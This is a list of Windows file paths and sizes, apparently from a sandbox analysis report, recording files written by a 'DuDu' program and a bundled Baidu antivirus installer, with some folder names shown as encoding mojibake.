      C:\DuDu\skinConfig\ĬÈÏ\ImageLookDlgConfig\MainSkin.ini (130 bytes)
      C:\DuDu\KpInstallTheme.exe (157 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\TongJICNZZ.dll (1333 bytes)
      C:\DuDu\Appsoftconfig\image\buttoncoculation.png (196 bytes)
      C:\DuDu\MSGBoxSkin\UI\warning.png (3 bytes)
      C:\DuDu\MSGBoxSkin\UI\yes_button.png (1 bytes)
      C:\DuDu\Appsoftconfig\softtempfile\soft.xml (196 bytes)
      C:\DuDu\Appsoftconfig\APPversion.ini (59 bytes)
      C:\DuDu\skinConfig\skinversion.ini (29 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\IconsFolderNavigation_Layer.ini (1 bytes)
      C:\DuDu\Appsoftconfig\button.xml (2 bytes)
      C:\DuDu\MSGBoxSkin\UI\bg_top.png (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\bg_small.png (196 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\MyBaoku.ini (3 bytes)
      C:\DuDu\DuDu_v1.exe (5490 bytes)
      C:\DuDu\SkinCenter.dll (3635 bytes)
      C:\DuDu\MSGBoxSkin\UI\delete.png (486 bytes)
      C:\DuDu\MSGBoxSkin\MSGBoxSkin.ini (2 bytes)
      C:\DuDu\Appsoftconfig\image\Iebuttonlogo.png (196 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\MainSkin.ini (3 bytes)
      C:\DuDu\MSGBoxSkin\UI\cancel-button.png (1 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\tag.ini (205 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\cancel.png (3 bytes)
      C:\DuDu\Repairer.exe (549 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\FeedbackDlgConfig\MainFeedbackDlg.ini (880 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\BootScreenNavigation_Layer.ini (2 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\HomePageShow_Layer.ini (3 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\LocalManagement_Layer.ini (1 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\DesktopWallpaperNavigation_Layer.ini (196 bytes)
      C:\DuDu\MSGBoxSkin\UI\retry_button.png (1 bytes)
      C:\DuDu\skinConfig\skinconfig.ini (84 bytes)
      C:\DuDu\MSGBoxSkin\UI\infomation.png (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\MsgBox_1.ini (729 bytes)
      C:\DuDu\Appsoftconfig\image\sou.png (196 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\cheakskin\MainSkin.ini (1 bytes)
      C:\DuDu\skinConfig\SkinSetting.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\installedSoftInfo.ini (2 bytes)
      C:\DuDu\Appsoftconfig\image\buttonclear.png (196 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\LocTween_Layer.ini (1 bytes)
      C:\DuDu\Appsoftconfig\image\buttonsou.png (196 bytes)
      C:\DuDu\DeskTopPop.exe (1529 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\UploadImageLayer.ini (3 bytes)
      C:\DuDu\Appsoftconfig\image\clear.png (3 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\DownloadWebImageDlg\MainSkin.ini (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\btn_known.png (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVUpdate.rdb (13584 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB8.tmp (34640 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\NewPih.dll (4992 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\FileMon.dll (18424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\DriverManager.dll (4992 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayDldProtect.rdb (6360 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDCooly.dll (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdRepair.exe (13584 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CompatibilityChecker.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVCached.dll (11048 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe (3361 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVMainFrame.dll (7345 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nskB5.tmp (898351 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\bduf.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDPerflog.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ieBaiduSDDetectPlug.dll (4992 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVQuarantine.rdb (10 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVMainFrame.dll (32128 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMMsg.dll (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\BDMSkin.dll (37025 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\SearchProtection.rdb (5064 bytes)
      %WinDir%\Fonts (864 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMReport.dll (12024 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVEng.dll (4185 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\virus_type.dat (485 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDLogicUtils.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKitUtils.dll (1856 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\KavUpdate.dll (1281 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\卸载百度杀毒.lnk (944 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BSRLib.dat (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\kav_verify.dat (677 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe (10815 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray.rdb (19152 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\systemfile.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMTinyXml.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Repair_PluginConfig.xml (411 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastImage.png (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMLog.dll (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\804.dat (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepBase.dll (27704 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\fm.dat (597 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\blacksign.dat (852 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdvs.dat (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\GetSupplyId.dll (3616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Repair_PluginConfig.xml (411 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\kav_verify.dat (677 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\KVInstallHelper.dll (12536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\app.ico (12024 bytes)
      %Documents and Settings%\%current user%\Cookies\index.dat (676 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMFrameWork.dll (10136 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll (2321 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\scan_mgr_config.dat (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\901.dat (8 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll (601 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\810.dat (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\KVCommonRes.rdb (132004 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\GameNoDisturb.ini (215 bytes)
      %Documents and Settings%\All Users\Desktop\百度杀毒.lnk (959 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\wverify.dat (66168 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMBase.dll (7345 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSDWrench.dll (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\DesktopToast.exe (3616 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPerfMon.dll (5064 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDConfig.dll (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\blacksign.dat (852 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (9605 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSREng.dll (9608 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMUpdate.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownloader.exe (42222 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdSvc.exe (15536 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\duilib license.txt (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdvs.dat (5 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\PrivacyProtect.dll (6360 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\hips.xml (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bduf.dll (11048 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\cache_config.dat (469 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDPerflog.dll (5064 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDCooly.dll (44 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\TrustAndIso.dll (8184 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVLogs.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVWsc.exe (13368 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdBugRpt.exe (19152 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\fm.dat (597 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\CompatibilityChecker.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\TrayPluginContainerConfig.xml (945 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\810.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll (601 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\virus_type.dat (485 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\directui license.txt (593 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ad.dll (15168 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\duilib license.txt (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\updlog.dll (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\GameNoDisturb.ini (215 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bd0001.dll (5064 bytes)
      %System%\config (4 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdRepair.exe (2321 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\systemfile.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMLog.dll (32 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe (2105 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\900.dat (8 bytes)
      %WinDir%\Prefetch (440 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepMgr.dll (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVLogs.dll (6584 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand.dll (5064 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMTinyXml.dll (6584 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVMainframe_PluginConfig.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDownloadProtect_x64.dll (6584 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\ad.dll (2321 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVWsc.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMBase.dll (32128 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVEng.dll (22192 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\dnw.xml (149 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tips.xml (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVTray_PluginConfig.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSRCore.dll (10136 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMEvents.dll (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand64.dll (4992 bytes)
      %Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDConfig.dll (19152 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMReport.dll (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSkin.dll (37368 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVTray_PluginConfig.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\npBaiduSDDetectPlug.dll (3616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\monitor_config.dat (559 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\900.dat (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdTray.exe (46916 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\NetService.ini (615 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico (2105 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\iexplore.exe.xml (528 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\res\InstallWnd.zip (12536 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMMsg.dll (33 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSkin.dll (8281 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\baidusdRepair.dll (601 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastImage.png (5 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTips.rdb (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\uninst.exe (28288 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt64.dll (2321 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDAVCScan.dll (4992 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Cooly_PluginConfig.xml (720 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSd.exe (13368 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\809.dat (3 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\811.dat (8 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\901.dat (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\804.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\DriverManager.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\百度杀毒.lnk (971 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KavUpdate.dll (9320 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMAVE.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\tuopan.png (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\806.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect_x64.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt64.dll (14184 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\tips.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMDownload.dll (11344 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMNet.dll (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\monitor_config.dat (559 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDUDiskGuard.dll (8560 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\directui license.txt (593 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKV.rdb (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\dnw.xml (149 bytes)
      %WinDir%\Temp\Perflib_Perfdata_1e0.dat (4 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVRtp_PluginConfig.xml (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\PluginInstallHelper.dll (3616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUpdate.exe (19152 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMDownload.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMPerfMon.dll (673 bytes)
      %WinDir%\Temp\Perflib_Perfdata_c3c.dat (100 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\UserDetectionPlugin.dll (5520 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (676 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastLogo.ico (12024 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RtpContainerConfig.xml (818 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepMgr.dll (10136 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMUpdate.dll (5520 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMEvents.dll (15 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDLogicUtils.dll (9320 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMNet.dll (28288 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\System.dll (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPatchAgent.dll (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
